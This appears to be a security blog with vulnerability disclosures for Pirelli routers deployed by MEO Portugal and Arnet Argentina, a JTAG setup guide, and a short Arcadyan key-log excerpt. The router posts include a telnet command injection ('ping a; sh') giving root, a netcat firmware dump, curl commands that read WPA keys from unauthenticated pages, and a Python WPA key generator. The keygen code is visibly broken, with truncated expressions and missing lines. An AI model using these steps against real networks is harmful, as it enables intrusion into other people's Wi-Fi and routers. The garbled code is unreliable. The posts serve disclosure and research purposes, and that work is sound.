Hacking again Pirelli routers: ADB Pirelli P.DG A4000N deployed by MEO Portugal

Jueves, 7 de mayo de 2015 Sin comentarios


Sticker at the bottom of routers

Sticker at the bottom of routers

Few months after CVE-2015-0558 full disclosure I was contacted by our reader Kara Davis who identified the same WPA key generation algorithm in the model P.DG A4000N, distributed by Portuguese ISP, MEO. Such routers can be recognized for their ESSID and MAC addresses. The ESSIDs are normally following this pattern: ADSLPT-ABXXXXX and the mac addresses are corresponding to the Pirelli brand.  When I verified the information, I gave a chance to dump the firmware and see whether the old vulnerabilities (CVE-2015-0554, CVE-2015-0558) were also in there. From testing and evidence we concluded the existing PoC could also generate the default WPA password for this model. Simple changes such as generating from a different mac address interface and reducing length from 10 to 8 chars had to be implemented. However, the algorithm used was evidently the same as in P.DG A4001N distributed by Arnet in Argentina. Kara Davis and I agreed into a responsible disclosure and decided to investigate further.

First of all, we  dumped out the firmware image from the router via an OS command injection in the telnet service. After, we managed to do so, same algorithm was eventually found in there. On top of that, the same unauthorized access was discovered as well. Likely this router has plenty of vulnerabilities as well, simply we decided to stop with this model.


Summarizing, the router P.DG A4000N deployed by MEO Portugal presents the following flaws:

  1. Weaknesses on the default WPA key generation algorithm
  2. OS command injection through the telnet service concluding with root in the box
  3. Unauthorized access to almost all the HTML code


Identifying hardware components

Discovering the hardware. UART'ing the board

Discovering the hardware. UART’ing the board

Digging into the hardware components can be really useful to achieve information about our target. When we try to extract memory contents or JTAG the device, we do have to know its characteristics and which attacking points we eventually got. Debugging interfaces such as UART or JTAG are commonly in many embedded devices. The majority of routers have a  UART port and depending on the SoC also a JTAG port.

Unfortunately, our target only has a UART port. After hooking up some cables into the UART pins, we are able to find out information about how the OS and how the booting process is going on.  For instance,  when we try to “uart” a device,  first we try to access to a shell or command line environment. Moreover, we can recollect useful info such as different Flash memories names which the firmwares could be stored in, the base address where the OS is loaded into, which CPU (SoC) we are dealing with, what WiFi module the device is comprised of and things like that.  Zooming the picture in, the reader will recognize the main components in this router. The most important components are the SoC, Flash and debugging interfaces.  The System-on-Chip(SoC) is a Broadcom bcm6328. The flash is a Macronix mx25l12845emi-10g which can be read out without desoldering with any decent EEPROM programmer. Fortunately, another flaw allowed me to dump the whole firmware image much faster and easier.

The most relevant lines from the booting process are shown below:

CFE version 1.0.37-106.24 for A4001N TEF 0001 BCM96328 (32bit,SP,BE)
Build Date: mar set  6 12:27:14 CEST 2011 (marcodl@localhost)
Copyright (C) 2000-2009 Broadcom Corporation.
HS Serial flash device: name MX25L128, id 0xc218 size 16384KB
Total Flash size: 16384K with 4096 sectors
Chip ID: BCM6328B0, MIPS: 320MHz, DDR: 320MHz, Bus: 160MHz
Total Memory: 33554432 bytes (32MB)
Boot Address: 0xb8000000
Board IP address                  :
Run from flash/host (f/h)         : f
Default host run file name        : vmlinux
Default host flash file name      : bcm963xx_fs_kernel
Board Id (0-4)                    : 963281TAN
Base MAC Address                  : 84:26:15:ae:bc:13
PSI Size (1-64) KBytes            : 64
Enable Backup PSI [0|1]           : 0
System Log Size (0-256) KBytes    : 0
Main Thread Number [0|1]          : 0
*** Press any key to stop auto run (1 seconds) ***
Auto run second count down: 0
Booting from only image (0xb8010000) ...
Code Address: 0x80010000, Entry Address: 0x80014230
Decompression OK!
Entry at 0x80014230
Starting program at 0x80014230
Linux version 2.6.30 (cx1giordan@thor) (gcc version 4.4.2 (Buildroot 2010.02-git
) ) #1 Mon Jan 21 17:14:53 CET 2013
HS Serial flash device: name MX25L128, id 0xc218 size 16384KB
kerSysEarlyFlashInit: bootCfeVersion has value cfe-A4001N-V0001
963281TAN prom init
CPU revision is: 0002a075 (Broadcom4350)
Determined physical RAM map:
 memory: 01f00000 @ 00000000 (usable)
Zone PFN ranges:
  DMA      0x00000000 -> 0x00001000
  Normal   0x00001000 -> 0x00001f00
Movable zone start PFN for each node
early_node_map[1] active PFN ranges
    0: 0x00000000 -> 0x00001f00
Kernel command line: root=31:0 ro noinitrd console=ttyS0,115200
Serial: BCM63XX driver $Revision: 3.00 $
ttyS0 at MMIO 0xb0000100 (irq = 36) is a BCM63XX
ttyS1 at MMIO 0xb0000120 (irq = 47) is a BCM63XX
bcmxtmrt: Broadcom BCM6328B0 ATM/PTM Network Device 
init started:  BusyBox v1.00 (2013.01.21-16:17+0000) multi-call binary
BusyBox v1.00 (2013.01.21-16:17+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.
===== Release Version PDGA4000N_PT_4.06L.2.2828 (build timestamp 130205_1145) ==
SerialNumber: 47502E0021746
WPA Key: 78leqnej
WPS Device PIN = 14258671
Setting SSID: "ADSLPT-AB37495"
BCM96328 Broadband Router


For further information of the booting process through UART port: bootlog_pirelli_portugal.

For further information for the SoC bcm63xx. Besides, some useful information about a similar device : ADB P.DG A4001N1.


Extracting the firmware image via OS command injection

Same old, same old command  injection

Same old, same old command injection

The router is distributed with telnet enabled by default with the usual admin credentials although there is a constrained shell where not much can be done. Looking into the commands available we do not find much help, therefore I decided to try some simple command injection and in matter of seconds I got into the Busybox ash shell. Once achieved root rights, we noticed that netcat was available in the OS. Having already netcat and root right we easily transfer the mtdblock which stores a backup of the firmware image. To do so, a simple combination of cat and netcat allows us to correctly dump the firmware into our box. At this point the firmware is exposed and the mtdblocks and libraries are  completely accessible for a firmware analysis. Any router based on BCM96328 could be affected too as well as many other Broadcoms. The security in routers is quite poor indeed.

To dump the firmware open up several shells. From the router:

$ telnet
> ping a; sh
# cat /dev/mtdblock1 | ncat -l -p 6666

From our box:

$ nc 6666 > me0firmware.bin

The firmware image can be found at the new repository exclusively for firmware images deployed by international ISPs. Please help us!


Default WPA key generation algorithm

Since I have already explained this point at my last entry. It would result repetitive explain it again. Please take a look at the last entry. Once unpacked the firmware image by using Binwalk, we are able to load some libraries and binaries into IDA Pro. An ESSID generation is seen before generating WPA keys. Clearly the ESSID is generated from the mac address as well as the WPA key. Take a look at the highlighted lines into the MIPS assembler code. You will realize how the mac address is definitely involved in such generations.

addiu   $v0, $fp, 0x30+var_10
lw      $a0, 0x30+arg_0($fp)
la      $v1, 0xC0000
addiu   $a1, $v1, (aWl0 - 0xC0000)  # "wl0"
move    $a2, $v0
la      $v0, wlmngr_getPBSHwAddr
move    $t9, $v0
jalr    $t9 ; wlmngr_getPBSHwAddr
lw      $gp, 0x30+var_20($fp)
lbu     $v0, 0x30+var_E($fp)
andi    $v0, 0xF
sll     $v1, $v0, 24
lbu     $v0, 0x30+var_D($fp)
sll     $v0, 16
or      $v1, $v0
lbu     $v0, 0x30+var_C($fp)
sll     $v0, 8
or      $v1, $v0
lbu     $v0, 0x30+var_B($fp)
or      $v1, $v0
li      $v0, 0x14F8B589
mult    $v1, $v0
mflo    $a1
mfhi    $a0
sra     $a0, 13
sra     $v0, $v1, 31
subu    $v0, $a0, $v0
la      $a0, loc_186A0
mul     $v0, $a0
subu    $v0, $v1, $v0
move    $v1, $v0
lw      $v0, 0x30+var_18($fp)
addu    $v0, $v1, $v0
sw      $v0, 0x30+var_14($fp)
la      $v0, 0xC0000
addiu   $v0, (aAdslptAb05d - 0xC0000)  # "ADSLPT-AB%05d"
lw      $a0, 0x30+arg_4($fp)
move    $a1, $v0
lw      $a2, 0x30+var_14($fp)
la      $v0, sprintf
move    $t9, $v0
jalr    $t9 ; sprintf

The rest has nothing to be explained again. To sum up, WPA keys are easily recovered by an adversary as I explained in the last entry.


Unauthorized access via HTTP

Meanwhile we were checking one by one the previous problems in other Pirelli routers, we rapidly checked if the WAN access was enabled by default as happened in CVE-2015-0554. To remember readers, both Spain and Argentina had enabled the WAN interface resulting vulnerable from outside. In Portugal (un)-fortunately the WAN access was completely disabled by default. At this point, we are capable of concluding that either our firmware version was disabled or all versions are disabled. This vulnerability can be only exploited within the internal network (LAN). Author has not been capable of exploiting the router remotely with the version FW : PT_4.06L.2.2020 HW: R01.


Problems and models affected

I wanted to do a responsible disclosure, therefore I contacted the Portuguese ISP MEO and was surprised by a quick reply via Twitter, indicating to forward details to a specific person which I immediately did. Unfortunately from this day, I am still waiting for a reply. ADB/Pirelli and Arnet are aware of the vulnerability since 2014. Eventually, I decided to do full disclosure in the new model identified to speed up fixing the problem and/or replacing the affected routers for avoiding intrusions. Once again, neither the ISPs nor the manufacturer have shown interest in discussing the problem after several contacts.

The vulnerability is considered quite serious, a malicious attacker within the WiFi range can calculate the default password and gain access to the network, compromise and use it for malicious purposes.

I strongly recommend everyone using affected units to immediately change their default WPA password.
The models identified as vulnerable are:

  • P.DG A4001N – SSID: Wifi-Arnet-XXXX – Arnet Argentina
  • P.DG A4000N – SSID: ADSLPT-ABXXXXX – MEO Portugal

More countries will be disclosed soon. Pirelli has made the same mistake around the world.



2015-04-01  Confirmed that the  Portuguese ISP “MEO” uses the same algorithm
2015-04-05  Send a message to @MEOpt via Twitter @enovella_
2015-04-05  I got response in matter of minutes \o/
2015-04-05  I send an email to luis-oliveira-cc@telecom.pt , stating the reference 3-78405621289 in email subject
2015-05-07  Full disclosure



This proof-of-concept and many Pirelli default key generation algorithms can be found at my Bitbucket repository. Looking at the first picture of this entry, the reader can prove as the WPA keys can be recovered in matter of seconds for any router with default settings. Checking the mac address in the sticker attached to the router,  an adversary will have to tweak the LAN mac address with the WLAN mac address which is public.  The difference is just minus 1 (-1). Both Pirelli Arnet and MEO have been combined in the same program. From now on, the Python script called pirelli.py will be responsible for generating such WPA keys.

Disclaimer: Be ethical! I am not responsible for what you do with this script  :)

$ python pirelli.py  -b 84:26:15:ae:bc:14
[+] MAC     : 84:26:15:ae:bc:14
[+] WPA key : 78leqnejoj	SSID: WiFi-Arnet-XXXX (Argentina)
[+] WPA key : 78leqnej  	SSID: ADSLPT-ABXXXXX  (Portugal)


Please Pirelli, if you read this please contact with me. You would make me quite happy with some Pirelli tyres for my racing bike :)

CVE-2015-0558: Reverse-engineering the default WPA key generation algorithm for Pirelli routers in Argentina

Lunes, 5 de enero de 2015 8 comentarios



Sticker with default settings

A couple of years ago whether I do not remember badly, I was doing reverse engineering in some Spanish routers deployed by Pirelli as well. After I extracted the firmware and found out a suspicious library with many references to key generation’s functions everything was over. Unfortunately, I could not recover the algorithm itself. Principally, because those routers were not using the same algorithm  for generating default keys and simply because such algorithm was not explicitly there. Shit happens!  However, as I could not reveal the algorithm then decided to try another way to recover keys. Eventually, I realised that these routers were vulnerable to unauthorized and unauthenticated remote access and any adversary could fetch HTML code from our public IP address. Plenty of HTMLs were able to be downloaded without any restriction, meaning a huge leakage. Being vulnerable to a bunch of evil attacks. This  remote information disclosure can be seen on this CVE-2015-0554. On the other side, I do not know whether Argentinian routers are also vulnerable to this vulnerability. Feel free to try it out and let me know too.

Just to see how easy was to achieve those keys in the HomeStation(essids-like WLAN_XXXX)  in Spain, a simple curl command was enough:

$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "WLAN_"
                  <option value='0'>WLAN_DEAD</option>

$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var wpapskkey"
var wpaPskKey = 'IsAklFHhFFui1sr9ZMqD';

$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var WscDevPin"
var WscDevPin    = '12820078';

Today I am gonna explain how I reverse engineered a MIPS library in order to recover the default WPA key generation algorithm for some Argentinian routers deployed by Pirelli.  Concretely the router affected is the model P.DG-A4001N.  First of all, I am neither Argentinian nor live there. Nevertheless, accidentally  I observed some stickers from Pirelli routers in a random forum and as an user had already publicly published the firmware for those routers then I decided to give a try.  As I still remembered the file where I dug into for the Spanish routers,  I rapidly tried to recover the algorithm in these routers. Next writing is the way I followed until to achieve it.

Reverse-engineering the default key generation algorithm

In this section, we are going to reverse engineer a MIPS library, /lib/private/libcms.core,  found out in the firmware itself.  First of all, let us comment that the firmware was physically extracted for another user (fernando3k) and subsequently unpacked using Binwalk and firmware-mod-kit by me. Once was mounted into our system, we found out a function called generatekey. As you have seen,  symbols have not been removed in binaries and external function names are still there because dynamic compilation. This help us a lot in our reverse engineering task.  On top of that, we rapidly saw how this function was calling to another one called generatekey_from_mac. At this moment, I decided to give a go to this challenge. Before get started, IDA Pro can help us with the cross references (Xrefs to-from in IDA Pro) between functions. Let’s see how functions are called in the library. (Zoom pictures in to see properly)


Call flow from generateKey

Call flow from generateKey




Really looking great! Now let’s look at the cross references. We have figured out some tips:

  1. generatekey calls generatekey_from_mac.  This allow us to suppose that the mac address is involved in the key generation algorithm. Besides, getPBSHwaddr returns a mac address and it is also called by generatekey. Verification was carried out after checking how getPBSHwaddr returned the value of /var/hwaddr ( “ifconfig %s > /var/hwaddr “)
  2. SHA256 cryptographic hash function is also involved. We then know that our key is coming from a well-known hash function. This way to generate WPA keys is very popular in some vendors because the feeling of “randomness”. Digging into this function will give us the main structure of our algorithm.
  3.  The function createWPAPassphraseFromKey is called by wlWriteMdmDefault ,which also calls to generatekey as well. Hence, we  discover a function called bintoascii which  is basically responsible to convert binary to ascii data.
  4. The SSID is also created from the mac address although it is not relevant for our task.


Call flow for createWPAPassphraseFromKey

Call flow for createWPAPassphraseFromKey


Now we must dissect the generatekey_from_mac function and its SHA256 callings to figure out how many parameters are being sent as input data. Before calling generatekey, a string “1236790” is sent to this function as first argument ($a3).  Nonetheless, we have to guess which is the right order for the SHA256 function, I mean how many updates there are. If we observe the below picture, we will see this step.



Dissasembly of wlWriteMdmDefault



From generateKey_from_mac we realise that: (Look at below image)

  1.  First argument is located at offset 0x000d29e0
  2.  Second argument is the string we discovered previously (“1236790”)
  3.  Third argument it has to be the mac address because there is an instruction load immediate with the value  6. Since a mac address is 6 bytes, we can try it out now.

Dissasembly of generateKey_from_mac


As we know that the first argument is located at the offset 0xd29e0, just a jump there and let’s reveal the secret seed used in the SHA256.  Now we have guessed the first argument, and we can prepare those 32 bytes into a byte-array structure to generate the  SHA256 hash later on. This secret seed has been used by Pirelli too in other countries like Italy or Austria (Look at the references on the source code for more info). Furthermore, below that we can also distinguish the charset finally used to generate keys with.


Secret data found out in the library.



In the end, we conclude that the algorithm is as follows: (mac address needs to be incremented by 1)




More details on how keys are eventually generated  in this python function:

def genkey(mac):
    seed = ('\x64\xC6\xDD\xE3\xE5\x79\xB6\xD9\x86\x96\x8D\x34\x45\xD2\x3B\x15' +

    lookup  = '0123456789abcdefghijklmnopqrstuvwxyz'
    sha256 = hashlib.sha256()

    digest = bytearray(sha256.digest())
    return ''.join([lookup[x % len(lookup)] for x in digest[0:10]])


Since I attempted to do a responsible disclosure and neither ADB Pirelli nor Arnet Argentina were interested to discuss the problem, I have finally decided to do full disclosure to speed up the process of fixing. It looks like the only way with some vendors, just enforce them to replace routers for avoiding intrusions. Many things can happen whether your router with SSID Wifi-Arnet-XXXX has the default password. For your information, default passwords are located in a sticker at the bottom of routers. If you are owner of these networks, please change your password as soon as possible. You should always change the default passwords, though.

An adversary, within of the wifi range,  could access to your network and commit any sort of fraud. Be safe and change the passwords right now!


2014-09-11  Found the algorithm
2014-09-12  Send a message to @ArnetOnline via Twitter @enovella_
2014-09-15  Send a message via website, still looking for a simple mail
2014-09-16  Send another message to Arnet via website.First reply via twitter where they redirect me to the website form.
2014-09-19  Direct message via twitter. I talk with them about the critical vulnerability and offer them an email with PGP key
2014-09-20  More twitter PM about the same. They do not want to be aware about the problem though.
2014-09-23  I assume that Arnet does not care about its clients’ security at all regarding its little interest.
2014-09-24  I send the problem to the vendor ADB Pirelli via website form
2014-09-28  I send the problem to the vendor ADB Pirelli via email to Switzerland
2015-01-05  Full disclosure


This proof-of-concept and many Pirelli default key generation algorithms might be found at my Bitbucket repository. I hope you can use them. Also a copy&paste of the first version can be looked at below.

To be installed just make sure you got git installed on your system and then run:

$ git clone https://dudux@bitbucket.org/dudux/adbpirelli.git
$ cd adbpirelli && chmod +x *.py
$ python wifiarnet.py

#!/usr/bin/env python
# -*- coding: utf-8 -*-

@license: GPLv3
@author : Eduardo Novella 
@contact: ednolo[a]inf.upv.es 
@twitter: @enovella_ 

[*] Target      : 
Vendor           : ADB broadband Pirelli
Router           : Model P.DG-A4001N
ISP              : Arnet Telecom Argentina
Possible-targets : http://hwaddress.com/?q=ADB%20Broadband%20Italia
Firmware         : http://foro.seguridadwireless.net/puntos-de-acceso-routers-switchs-y-bridges/obtener-firmware-adb-p-dg-a4001n-%28arnet-telecom-argentina%29/   

[*] References  : 
[0] [AUSTRIA] A1/Telekom Austria PRG EAV4202N Default WPA Key Algorithm Weakness    http://sviehb.wordpress.com/2011/12/04/prg-eav4202n-default-wpa-key-algorithm/
[1] [ITALY]   Alice AGPF: The algorithm!                                            http://wifiresearchers.wordpress.com/2010/06/02/alice-agpf-lalgoritmo/
[2] [ARGENTINA] CVE-2015-0558: Reverse-engineering the default WPA key generation   http://ednolo.alumnos.upv.es/?p=1883
                algorithm for Pirelli routers in Argentina

[*] Test vectors : 

[*] Acknowledgements  : 
Thanks to fernando3k for giving me the firmware in order to do reverse-engineering on it , and christian32 for showing me a bunch of test vectors.

[*] Timeline    : 
2014-09-11  Found the algorithm
2014-09-12  Send a message to @ArnetOnline via Twitter @enovella_
2014-09-15  Send a message via website, still looking for a simple mail (http://www.telecom.com.ar/hogares/contacto_tecnico.html)
2014-09-16  Send another message to Arnet via website. First reply via twitter where they redirect me to the website form.
2014-09-19  Direct message via twitter. I talk with them about the critical vulnerability and offer them an email with PGP key
2014-09-20  More twitter PM about the same. They do not want to be aware about the problem though.
2014-09-23  I assume that Arnet does not care about its clients' security at all regarding its little interest.
2014-09-24  I send the problem to the vendor ADB Pirelli via website form
2014-09-28  I send the problem to the vendor ADB Pirelli via email to Switzerland
2015-01-05  Full disclosure and CVE-2015-0558 assigned

[*] TODO        : 
1.- Reverse-engineering the function generateSSIDfromTheMac. It is not relevant though.
2.- Extract more firmwares from others vendors and send them to me.

[*] Changelog   : 
2015-01-12   v1.2         Real bugfix for macddress
2015-01-10   v1.1         --allKeys flag added  && bugfix with macaddress' jumps (thanks to Nicolás Chaves)
2014-09-11   v1.0         First PoC working


import re
import sys
import hashlib
import argparse

VERSION     = 1
DATEVERSION = '2015-01-12' 
URL         = 'http://www.ednolo.alumnos.upv.es'

def genkey(mac,stdout='True'):
    seed = ('\x64\xC6\xDD\xE3\xE5\x79\xB6\xD9\x86\x96\x8D\x34\x45\xD2\x3B\x15' +

    lookup  = '0123456789abcdefghijklmnopqrstuvwxyz'
    sha256 = hashlib.sha256()

    digest = bytearray(sha256.digest())

    if (stdout):
        print "[+] SHA256  : %s" % sha256.hexdigest()
    return ''.join([lookup[x % len(lookup)] for x in digest[0:10]])

def printTargets():
        print "[+] Possible vulnerable targets so far:"
        for t in targets:
            print ("\t bssid: {0:s}:XX:XX:XX \t essid: WiFi-Arnet-XXXX".format(t.upper()))


def checkTargets(bssid):
        supported = False
        for t in targets:
            if ( bssid.upper().startswith(t) ):
                supported = True
        if (not supported):
            print "[!] Your bssid looks like not supported! Generating anyway."

def addIncToMac(mac_str, inc):
        mac = bytearray.fromhex('%012x' %(int(mac_str,16) + inc))
        sys.exit('[!] Use real input :)')
    return mac

def main():
    global targets
    version     = " {0:d}.{1:d}  [{2:s}] ----> {3:s}".format(VERSION,SUBVERSION,DATEVERSION,URL) 
    targets = ['00:08:27','00:13:C8','00:17:C2','00:19:3E','00:1C:A2','00:1D:8B','00:22:33','00:8C:54',
    parser = argparse.ArgumentParser(description='''>>> PoC WPA keygen for WiFi Networks deployed by Arnet in Argentina. So far 
                                                 only WiFi networks with essid like Wifi-Arnet-XXXX and manufactured by Pirelli are 
                                                 likely vulnerable. See http://ednolo.alumnos.upv.es/ for more details.
                                                 Twitter: @enovella_  and   email: ednolo[at]inf.upv.es''',
                                                 epilog='''(+) Help: python %s -b 74:88:8B:AD:C0:DE ''' %(sys.argv[0])
    maingroup = parser.add_argument_group(title='required')
    maingroup.add_argument('-b','--bssid', type=str, nargs='?', help='Target mac address')
    parser.add_argument('-v', '--version', action='version', version='%(prog)s'+version)
    command_group = parser.add_mutually_exclusive_group()
    command_group.add_argument('-l','--list', help='List all vulnerable targets (essid Wifi-Arnet-XXXX)', action='store_true')
    command_group.add_argument('-a','--allkeys', action="store_true",  help='Bruteforce mode')
    args = parser.parse_args()

    if args.list:
    elif args.bssid:
        mac_str = re.sub(r'[^a-fA-F0-9]', '', args.bssid)
        if len(mac_str) != 12:
            sys.exit('[!] Check MAC format!\n')  
            print '[+] SSID    : WiFi-Arnet-XXXX' 
            print '[+] MAC     : %s' % args.bssid

            if (args.allkeys):
                print '[+] WPA key :'
                for i in xrange(-2,5):
                    mac = addIncToMac(mac_str,i)
                    print '\t%16s' % (genkey(mac,False))
                print '[+] WPA key : %s' % (genkey((addIncToMac(mac_str,0)),False)) 
            sys.exit('[!] Are you trying to crash me? :)')

if __name__ == "__main__":
Categories: Python, Reversing, Wireless Tags:

Installing UrJTAG and Altera USB blaster JTAG on Linux Ubuntu 12.04

Jueves, 5 de junio de 2014 Sin comentarios

Hey everyone, I was not writing for a while due to my little sparse time. Today I am going to talk about how to set up your box in order to debug some embedded systems by using JTAG. I will not describe it in detail because I am writing a paper talking about exactly that topic. Therefore, that paper will  explain sufficiently deep all this stuff. However, you can get working your really cheap JTAG on any Linux system following the next steps. The great feature of these JTAG is that support MIPS architecture, therefore we can extract many firmwares of the routers-modems and others  embedded devices.

JTAG is an acronym for Joint Test Action Group. It is a serial wire protocol dedicated to testing and recovering embedded hardware. It is a specialism of the synchronous four wire Serial Peripheral Interface (SPI). JTAG has a (slow) line clock (TCK), separate data in (TDI) and data out (TDO) lines, and a “test mode select” (TMS) line for controlling the state of the JTAG engine. TDI and TMS are clocked-in on the rising edge of TCK, and TDO is clocked out on its falling edge. Sometimes there is also a test reset line (TRST). [1]

To JTAG a device requires a JTAG cable. Though these days, the “cable” is usually a programmer with its own on-board logic. Chinese clones of the popular Altera USB-Blaster JTAG programmer are inexpensive, costing under 7 euros [1]

How to install your  Altera USB-blaster JTAG on Linux

First of all, we can check out which ID vendor has our Altera blaster:

$ lsusb 
Bus 001 Device 014: ID 09fb:6001 Altera 

After that, we must to add a new rule in our udev system in order to communicate our device in userland with the kernel : [2] [3]

$ sudo vim /etc/udev/rules.d/altera-usb-blaster.rules
	ATTR{idVendor}=="09fb", ATTR{idProduct}=="6001", MODE="666"

Later on,  we try to see how this change affected our system. Just extract the USB-JTAG and plug it in again.

$ sudo udevadm control --reload-rules
$ dmesg | tail
[472572.885351] usb 2-1.3: New USB device found, idVendor=09fb, idProduct=6001
[472572.885356] usb 2-1.3: New USB device strings: Mfr=1, Product=2, SerialNumber=3
[472572.885360] usb 2-1.3: Product: USB-Blaster
[472572.885362] usb 2-1.3: Manufacturer: EPFL
[472572.885365] usb 2-1.3: SerialNumber: 00000000

Our USB-JTAG Altera blaster should be ready to play around with it.   usbblaster

How to install the Universal JTAG  on Linux

Once our device is recognized  for our box, we still need a software to use our JTAG device. Many JTAG devices  are based on the chip from “Future Technology Devices International” (FTDI) known as the FTDI FT2232. However, our Altera USB-blaster JTAG also shows up as FTDI devices, but are not protocol-compatible with the FT2232 devices. They are, however, protocol-compatible among themselves. USB-JTAG devices typically consist of a FT245 followed by a CPLD that understands a particular protocol, or emulates this protocol using some other hardware. [7] Before installing the UrJTAG (Universal JTAG library), some dependencies must be resolved:

$ sudo apt-get install libftdi-dev libusb-1.0-0 -y

We have 3 possible options to install UrJTAG.

Option 1 (subversion  #2041)

I highly recommend that option because you’ll get the last updates so far for the framework.  Actually, I did not play too much yet to verify whether it is better stable or unstable trunk.

$ svn checkout svn://svn.code.sf.net/p/urjtag/svn/trunk urjtag-svn
$ cd urjtag/jtag
$ sudo apt-get install autopoint gettext libtool -y
$ ./autogen.sh
$ ( ./configure done by autogen.sh; run it here with special options if needed )
$ make
$ make install

$ cd urjtag-svn/urjtag/src/apps/jtag
$ ./jtag
UrJTAG 0.10   2041
Copyright (C) 2002, 2003 ETC s.r.o.
Copyright (C) 2007, 2008, 2009 Kolja Waschk and the respective authors

UrJTAG is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
There is absolutely no warranty for UrJTAG.

warning: UrJTAG may damage your hardware!
Type "quit" to exit, "help" for help.


Option 2 ( from sourgeForge  #1502 )

Whether you definitely prefer stability due to your hardware is already properly implemented. Then you can pick this option.

$ wget http://downloads.sourceforge.net/project/urjtag/urjtag/0.10/urjtag-0.10.tar.gz
$ tar zxvf urjtag-0.10.tar.gz
$ cd urjtag-0.10
$ ./configure

jtag is now configured for

  Detected libusb      : yes
  Detected libftdi     : yes
  Detected libftd2xx   : no
  Detected inpout32    : no
  Build SVF player     : yes
  Build BSDL subsystem : yes
  Bus drivers          : au1500 avr32 bcm1250 bf526_ezkit bf527_ezkit bf533_stamp bf533_ezkit bf537_stamp bf537_ezkit bf538f_ezkit bf548_ezkit bf561_ezkit bscoach ejtag ejtag_dma fjmem ixp425 jopcyc h7202 lh7a400 mpc5200 mpc824x ppc405ep ppc440gx_ebc8 prototype pxa2x0 pxa27x s3c4510 sa1110 sh7727 sh7750r sh7751r sharc_21065L slsup3 tx4925 zefant_xs3 
  Cable drivers        : arcom byteblaster dlc5 ea253 ei012 ft2232 igloo jlink keithkoep lattice mpcbdm triton usbblaster wiggler xpc 
  Lowlevel drivers     : direct ftdi ppdev 

$ make && sudo make install

$ cd ../src/

$ ./jtag 

UrJTAG 0.10 1502
Copyright (C) 2002, 2003 ETC s.r.o.
Copyright (C) 2007, 2008, 2009 Kolja Waschk and the respective authors

UrJTAG is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
There is absolutely no warranty for UrJTAG.

WARNING: UrJTAG may damage your hardware!
Type "quit" to exit, "help" for help.

jtag> cable Usbblaster
Connected to libftdi driver.
jtag> help
Command list:

quit          exit and terminate this session
help          display this help
frequency     setup JTAG frequency
cable         select JTAG cable
reset         reset JTAG chain
discovery     discovery of unknown parts in the JTAG chain
idcode        Read IDCODEs of all parts in a JTAG chain
detect        detect parts on the JTAG chain
signal        define new signal for a part
scan          read BSR and show changes since last scan
salias        define an alias for a signal
bit           define new BSR bit
register      define new data register for a part
initbus       initialize bus driver for active part
print         display JTAG chain list/status
part          change active part for current JTAG chain
bus           change active bus
instruction   change active instruction for a part or declare new instruction
shift         shift data/instruction registers through JTAG chain
dr            display active data register for a part
get           get external signal value
test          test external signal value
shell         shell cmmd
set           set external signal value
endian        set/print endianess
peek          read a single word
poke          write a single word
pod           Set state of POD signal(s)
readmem       read content of the memory and write it to file
writemem      write content of file to the memory
detectflash   detect parameters of flash chips attached to a part
flashmem      burn flash memory with data from a file
eraseflash    erase flash memory by number of blocks
script        run command sequence from external file
include       include command sequence from external repository
addpart       manually adds parts on the JTAG chain
usleep        Sleep some number of microseconds
svf           execute svf commands from file
bsdl          manage BSDL files
debug         debug jtag program

Type "help COMMAND" for details about a particular command.

Option 3 ( from Ubuntu repositories)

If you are lazy or just wanna try something quickly without compiling then you can take this option.

$ apt-cache search jtag
avarice - use GDB with Atmel's JTAG ICE for the AVR
flashrom - Identify, read, write, erase, and verify BIOS/ROM/flash chips
flexloader - utility to configure SRAM based ALTERA devices
libusbprog-dev - Development files for libusbprog
libusbprog0 - Library for programming the USBprog hardware
mspdebug - debugging tool for MSP430 microcontrollers
openocd - Open on-chip JTAG debug solution for ARM and MIPS systems
openwince-jtag - allows programming jtag capable devices such as CPUs or FPGAs
urjtag - JTAG programmer for various flash parts and boards
usbprog - Firmware programming tool for the USBprog hardware
usbprog-gui - GUI firmware programming tool for the USBprog hardware

$ sudo apt-get install -y urjtag


[1]   http://huaweihg612hacking.wordpress.com/2012/11/07/jtaging-the-broadcom-bcm6368-hg612/
[2]  http://www.altera.com/download/drivers/dri-usb_b-lnx.html
[3]  http://www.eecg.toronto.edu/~laforest/USB-Blaster-Debian.html
[4]  http://openocd.sourceforge.net/doc/pdf/openocd.pdf
[5]  http://sourceforge.net/p/urjtag/svn/HEAD/tree/trunk/
[6]  https://forum.openwrt.org/viewtopic.php?id=4191
[7]  http://openocd.sourceforge.net/doc/html/Debug-Adapter-Hardware.html#Debug-Adapter-Hardware

Categories: JTAGing, Linux, Reversing Tags:

Arcadyan routers used by Vodafone in Spain are also vulnerables

Martes, 4 de febrero de 2014 1 comentario


Around 2011 some routers manufactured by the company Arcadyan were reverse engineered for the staff of seguridadwireless.net. Such research came out for an user called MrFoffly or something like that. This guy obtained an interesting log from an update of Ya.com, he used an firmware image and applied xor FF in raw mode obtaining the following logs. Many routers could be affected for the same vulnerability in the future if this company keeps using same public and patented algorithms.


##!![E-BOOTPARAM-WRITE] User settings are not stored!!
###[BUILD-WEP] (Z1 Z2 Z3): %1X%1X%1X
##[BUILD-WEP] (x[1] XOR z[2])=(%1X XOR %1X)=%1X
##[BUILD-WEP] (y[2] XOR y[3]) =(%1X XOR %1X)=%1X
#[BUILD-WEP] (x[3]  XOR y[1]) =(%1X XOR %1X)=%1X
####[BUILD-WEP] (x[2]  XOR z[3]) =(%1X XOR %1X)=%1X
####[BUILD-WEP] (w[0] w[1] w[2] w[3]): %1X%1X%1X%1X
####%1X%1X%1X%1X%1X%1X%1X%1X%1X%1X%1X%1X%1X#[BUILD-WEP]: Key:%s
####[BUILD-WEP] K1,2:[%1X,%1X]
#[BUILD-WEP] (K1 XOR S10)=(%1X XOR %1X)=%1X
#[BUILD-WEP] (K1 XOR S9) =(%1X XOR %1X)=%1X
#[BUILD-WEP] (K1 XOR S8) =(%1X XOR %1X)=%1X
#[BUILD-WEP] (X1 X2 X3): %1X%1X%1X
##[BUILD-WEP] (K2 XOR M10)=(%1X XOR %1X)=%1X
#[BUILD-WEP] (K2 XOR M11)=(%1X XOR %1X)=%1X
#[BUILD-WEP] (K2 XOR M12)=(%1X XOR %1X)=%1X
